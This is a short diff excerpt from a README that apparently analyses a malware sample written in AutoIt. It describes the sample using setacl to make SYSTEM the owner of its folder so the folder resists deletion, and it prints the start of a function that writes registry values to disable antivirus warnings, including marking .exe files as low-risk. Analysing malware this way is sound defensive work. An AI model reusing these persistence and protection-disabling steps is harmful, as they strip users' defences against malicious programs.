raspiduino/how-profile-visitor-works/README.md

 <br> `setacl` is an FOSS (LGPL v2) tools for modifing the security permission of Windows.
 <br> It use `setacl` to set the owner of the folder to `SYSTEM` to avoid being deleted
 <br> But you can always change the folder owner by using `Security` tab in `Folder Properties`
-#### 14) 14th function: write registry to disable antiviruses and change the Chrome Update
+#### p) 14th function: write registry to disable antiviruses and change the Chrome Update
 ```autoit
 Func main14() ; Write registry to disable antiviruses and change the Chrome Update
 	RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_SZ", ".exe")